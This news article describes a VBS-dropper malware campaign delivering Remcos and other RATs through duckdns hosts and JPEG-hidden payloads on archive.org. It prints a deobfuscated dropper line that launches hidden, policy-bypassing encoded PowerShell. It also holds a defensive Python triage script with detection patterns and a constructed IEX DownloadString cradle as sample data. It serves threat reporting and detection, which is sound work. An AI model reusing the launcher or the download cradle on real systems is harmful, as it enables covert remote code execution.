Security researchers have uncovered a sophisticated malware campaign utilizing heavily obfuscated Visual Basic Script (VBS) files to deploy multiple types of remote access trojans (RATs).
The campaign, discovered in June 2025, involves a cluster of 16 open directories containing obfuscated VBS files, all sharing the filename “sostener.vbs” (Spanish for “sustain”).
These files serve as the initial stage of a three-part infection chain that ultimately grants attackers complete remote access to compromised systems.
The malware operation employs a complex multi-stage approach to evade detection and establish persistence.
Initial analysis reveals that the first-stage VBS files are deliberately bloated with nonsensical junk data, reaching sizes of two to three megabytes to complicate analysis.
Despite the varying obfuscation techniques used across samples, they all follow the same operational pattern: decoding base64 payloads and generating PowerShell scripts that connect to command-and-control (C2) infrastructure.
Censys researchers identified 17 unique versions of these VBS files across the infrastructure, noting that the campaign delivers several RAT families including LimeRAT, DCRat, AsyncRAT, and predominantly Remcos.
The threat actors behind this campaign have established a resilient infrastructure using dynamic DNS services, primarily “duckdns[.]org,” to maintain operational capability even as individual components are detected and blocked.
The infection begins when victims execute the initial VBS dropper, which contains heavily obfuscated code designed to hide its true purpose.
Upon execution, the first-stage loader decodes a base64-encoded payload and dynamically constructs a PowerShell script in memory, as shown in the following deobfuscated code fragment:
' Stage 1 dropper example (deobfuscated)
' The base64 blob is handed straight to powershell.exe through -Enc (an encoded
' command, i.e. base64 of the UTF-16LE script); -W Hidden plus the Run window
' style 0 keep the console invisible, and False means the VBS does not wait for exit.
tensiometer = "base64encodedpayload..."
CreateObject("WScript.Shell").Run "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " & tensiometer, 0, False
This PowerShell script constitutes the second stage of the attack, functioning as a stager that retrieves additional components from remote locations.
What makes this campaign particularly noteworthy is its innovative use of legitimate platforms for hosting malicious payloads.
The stager downloads components from various sources, including the Internet Archive where malware is concealed within seemingly innocent JPEG images.
Specifically, the Stage 3 payloads are embedded between the markers “>” and “>” within these images.
The attackers hide malicious code within JPEG images hosted on archive[.]org, making detection more difficult.
The tactics employed in this campaign, including the use of Spanish-language filenames and specific infrastructure patterns, share similarities with operations attributed to APT-C-36 (also known as Blind Eagle), a threat actor known to target Colombian organizations.
However, definitive attribution remains challenging based solely on the available technical evidence. As this campaign continues to evolve, organizations are advised to implement robust email filtering, disable macros by default, and monitor for suspicious PowerShell activity to mitigate potential compromise.
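The monitoring advice above can be made concrete. The following script is an added example (not from Censys or the article) that triages process-creation command lines for the launch pattern shown in the deobfuscated dropper (-NoP -NonI -W Hidden -Exec Bypass -Enc), decodes the -Enc payload (base64 of the UTF-16LE script) and checks the decoded text for the hosting indicators the campaign description names (duckdns, archive.org, download cradles). The sample log lines, the stager text and the archive.org path are constructed placeholders, not indicators from the campaign.

```python
import base64
import binascii
import re

# Abbreviated forms PowerShell accepts for -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Launch flags from the article's deobfuscated dropper: -NoP -NonI -W Hidden -Exec Bypass.
FLAG_RES = {
    "noprofile": re.compile(r"\s-nop\w*", re.IGNORECASE),
    "noninteractive": re.compile(r"\s-noni\w*", re.IGNORECASE),
    "hidden_window": re.compile(r"\s-w\w*\s+hidden", re.IGNORECASE),
    "exec_bypass": re.compile(r"\s-ex\w*\s+bypass", re.IGNORECASE),
}
# Strings worth flagging in the decoded script, taken from the campaign description.
INDICATORS = ("duckdns", "archive.org", "downloadstring", "downloadfile",
              "iex", "invoke-expression")

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -Enc/-e/-EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not valid base64, or not a UTF-16LE script

def analyze_command_line(cmdline):
    """Score one process command line; higher means more dropper-like."""
    flags = [name for name, rx in FLAG_RES.items() if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    lowered = (decoded or "").lower()
    indicators = [i for i in INDICATORS if i in lowered]
    score = len(flags) + (1 if decoded is not None else 0) + len(indicators)
    return {"flags": flags, "decoded": decoded, "indicators": indicators, "score": score}

def triage(lines, threshold=3):
    """Return (line, analysis) pairs whose score reaches the threshold."""
    scored = [(line, analyze_command_line(line)) for line in lines]
    return [(line, res) for line, res in scored if res["score"] >= threshold]

# Constructed sample: a stager-like script encoded the way the dropper launches it.
# The archive.org path is a placeholder, not a real campaign URL.
STAGER_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('https://archive.org/download/PLACEHOLDER-ITEM/photo.jpg')"
SAMPLE_B64 = base64.b64encode(STAGER_SAMPLE.encode("utf-16le")).decode()
SAMPLE_LINES = [  # constructed process-creation log lines, not real telemetry
    "CommandLine: powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + SAMPLE_B64,
    "CommandLine: powershell.exe -NoProfile -Command Get-Date",
    "CommandLine: powershell.exe -e " + base64.b64encode("Get-Process".encode("utf-16le")).decode(),
]
```

Only the first sample line reaches the threshold; a benign encoded command with no dropper flags and no hosting indicators scores too low to surface.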
The post New Sophisticated Multi-Stage Malware Campaign Weaponizes VBS Files to Execute PowerShell Script appeared first on Cyber Security News.